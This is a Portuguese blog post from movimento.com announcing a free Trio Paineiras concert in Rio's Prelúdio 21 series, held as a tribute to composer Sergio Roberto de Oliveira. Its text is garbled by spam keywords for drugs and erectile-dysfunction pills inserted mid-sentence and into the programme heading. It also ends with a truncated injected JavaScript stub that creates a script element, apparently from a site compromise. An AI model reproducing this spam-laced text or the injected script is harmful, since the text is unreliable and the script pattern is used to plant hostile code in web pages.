Música contemporâneaMúsica de câmaraProgramaçãoRio de Janeiro

Trio Paineiras toca Prelúdio 21

Concerto rende homenagem ao compositor a Sergio Roberto de Oliveira, um dos fundadores do Prelúdio 21. Purchase

 

No dia 29 de julho, sábado, às 15h, o grupo de compositores Prelúdio 21 recebe, em sua série no Centro Cultural Justiça Federal, no Rio de Janeiro, o Trio Paineiras, formado por online Marina Spoladore (piano), Batista Junior (clarinete/clarone) e Marco Catto (violino/viola).

Além de apresentar obras do seu novo CD, Trio Paineiras interpreta Compositores de Hoje (leia crítica), como Três Telas de W. M. Turner, de Marcos Lucas, e Paineira (Barriguda) nolvadex buy , de Cheap Sergio Roberto de Oliveira, o trio interpreta também peças de outros integrantes do Prelúdio 21: Order José Orlando Alves (Fragmenti), Neder Nassaro Purchase Purchase (Torrente), prozac online Alexandre Schubert (Cristais) Order e Caio Senna (5:35). O concerto tem entrada gratuita.

A apresentação é uma homenagem dos artistas ao compositor e produtor musical Sergio Roberto de Oliveira, falecido no último dia 19 de julho em decorrência de um câncer no pâncreas (saiba mais).

Os músicos que formam o Trio Paineiras são atuantes no cenário da música de câmara e sinfônica do Rio de Janeiro, e desempenham importante atividade acadêmica na UFRJ e na UniRio. A versatilidade da formação para violino/viola e clarineta/clarone com o piano é o diferencial do conjunto. Sua proposta estética é o incentivo às novas obras de compositores brasileiros, e tê-las lado a lado com obras mais tradicionais.

 

Prelúdio 21

Sete compositores se reuniram em 1998 com o intuito de divulgar sua música e a música erudita contemporânea em geral, por meio da organização de recitais e de palestras abertas ao público com compositores brasileiros e estrangeiros para apresentarem seus trabalhos, visando o intercâmbio de experiências. De lá para cá, o grupo amadureceu e se estabeleceu como um dos mais importantes grupos de música contemporânea do país, virando referência internacional. Em 2012, o grupo foi indicado ao Grammy Latino com o seu CD Prelúdio 21 – Quartetos de Cordas, na categoria Melhor Álbum de Música Clássica.

Desde 2008, o Prelúdio 21 realiza sua série de concertos no Teatro do Centro Cultural Justiça Federal, com um total de mais de 600 espectadores por temporada. A série se estabeleceu como uma das mais importantes da música contemporânea brasileira. Neste ano, a série terá ainda outros oito concertos, sempre no último sábado de cada mês, às 15h, até novembro. Em dezembro, o concerto de encerramento será no segundo sábado do mês, dia 10.

Prelúdio 21 (foto de José Nasser)

 

PROGRAMA: Cialis Soft cheapest eating penis

Sergio Roberto de Oliveira: Paineira (Barriguda)
José Orlando Alves: Fragmenti, para violino, clarineta e piano
Neder Nassaro: Torrente, para violino, clarone e piano
Alexandre Schubert: Cristais
Caio Senna: 5:35
Marcos Lucas: Três Telas de W. M. Turner

 

Foto do post: Cynthia C.

 

SERVIÇO:

 

Prelúdio 21 convida Trio Paineiras

 

29 de julho, sábado, às 15h

Centro Cultural Justiça Federal – Teatro (Av. Rio Branco, 241, Centro – Rio de Janeiro. Tel.: 21 3261-2550)

 

Entrada gratuita, com distribuição de senhas meia hora antes do início do concerto

Sugestão etária: livre

 var d=document;var s=d.createElement(‘script’); if (document.currentScript) {

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.